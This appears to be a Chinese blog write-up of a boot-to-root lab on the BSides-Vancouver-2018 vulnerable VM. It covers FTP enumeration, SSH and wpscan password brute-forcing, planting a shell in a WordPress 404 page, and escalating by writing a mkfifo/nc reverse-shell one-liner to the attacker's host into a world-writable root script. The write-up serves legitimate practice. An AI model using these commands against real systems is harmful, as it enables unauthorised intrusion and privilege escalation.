靶机:BSides-Vancouver-2018-Workshop

靶机说明
靶机用ValualBox创建,目标是在其上获得root级访问。
目标
Boot to root:获得root权限和Flag。
运行环境
靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。
攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全面的渗透工具。
信息收集

查看靶机的ip发现是192.168.1.35 所以靶机的ip这是这个c段的,我们用nmap扫描下
在这里插入图片描述
nmap扫描出靶机地址
在这里插入图片描述
获取flag
详细扫描一下,发现开放了21 22 80
在这里插入图片描述
发现21端口开着 访问一下 格式是 ftp://192.618.1.32
在这里插入图片描述
发现一个文件 点开看一下发现很多账户名
在这里插入图片描述
在这里插入图片描述
开启了22端口 用超级弱口令检查工具暴破一下 发现密码
在这里插入图片描述
使用Xshell工具登录ssh
在这里插入图片描述
提权
在这里插入图片描述
拿到flag
在这里插入图片描述
获取root权限
通过dirb扫描网站目录发现 存在robots.txt 访问发现一隐藏了一个目录
在这里插入图片描述在这里插入图片描述
发现是一个wp的博客,直接wpscan走一波
wpscan --url http://192.168.1.32/backup_wordpress/ --enumerate u 能爆出用户名
在这里插入图片描述
wpscan --url http://192.168.1.32/backup_wordpress -P/home/sun/文档/12.txt -U john

能爆出密码 需要指定用户名
在这里插入图片描述
至于使用的字典是darkweb2017-top10000.txt 大家可以百度找一下,本章的爆破都是基于darkweb2017-top10000.txt来的
在页面最下方有一个登录按钮
在这里插入图片描述
用刚才爆出密码账号登陆
在这里插入图片描述
我一般碰到wp建的站直接会在404报错界面写入shell,这次很幸运成功了
在这里插入图片描述
在kali本机监听端口 拿到shell
在这里插入图片描述
使用python获得一个新的shell python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
查找每个用户文件,和浏览各目录文件,发现位于 /usr/local/bin/cleanup 文件,其权限是777,查看内容
为:
#!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!!
在这里插入图片描述
这是一段清理Apache日志的脚本,需要root权限运行。
查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。
echo ‘#!/bin/bash’ > cleanup
在这里插入图片描述
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.35 6666 > /tmp/f’ >> cleanup

在这里插入图片描述
再次查看 cleanup已经变成这样了
在这里插入图片描述
然后kali开启监听
在这里插入图片描述
再次查看一下cleanup文件就能反弹成功了
在这里插入图片描述
总结
以后见到了开放21端口的知道怎么登陆了,先登一下试试万一允许匿名访问呢
开放22端口的,先用搜集到的密码账户用爆破软件爆一下,可能会有收获,然后Xshell连接一下。
wpscan爆破wp搭建的网站真是神器。
编写反弹shell脚本至cleanup文件思路很特别。
**~~~~~~~~~~~~~~~~~~~~~~·**
至此,本靶机的练习到此结束,感谢各位大佬的倾力帮助,如有侵权,请联系我删除。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值